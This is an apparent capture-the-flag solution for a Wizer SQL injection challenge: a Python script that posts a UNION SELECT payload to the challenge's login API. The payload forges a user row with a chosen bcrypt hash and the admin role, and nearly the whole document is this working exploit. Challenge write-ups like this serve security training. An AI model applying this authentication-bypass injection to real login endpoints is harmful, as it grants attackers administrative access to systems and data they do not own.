Wizer - Challenge 15 - SQLi

Exploit

import requests

url = "https://chal15.vercel.app/api/login"



r = requests.post(url, json=[
    {
        "value": "' UNION SELECT 1, 'pelele', '$2a$10$fIGARb4rSy3Fmzo75xQJReyivXWrl6UPK4LxTcDYwwrCHiPKyD.1W', 'admin', 'Gabriel', 'Tensey' -- ",
    },
    {
        "value": "pelele"
    }
])


print(r.text)
print(r.status_code)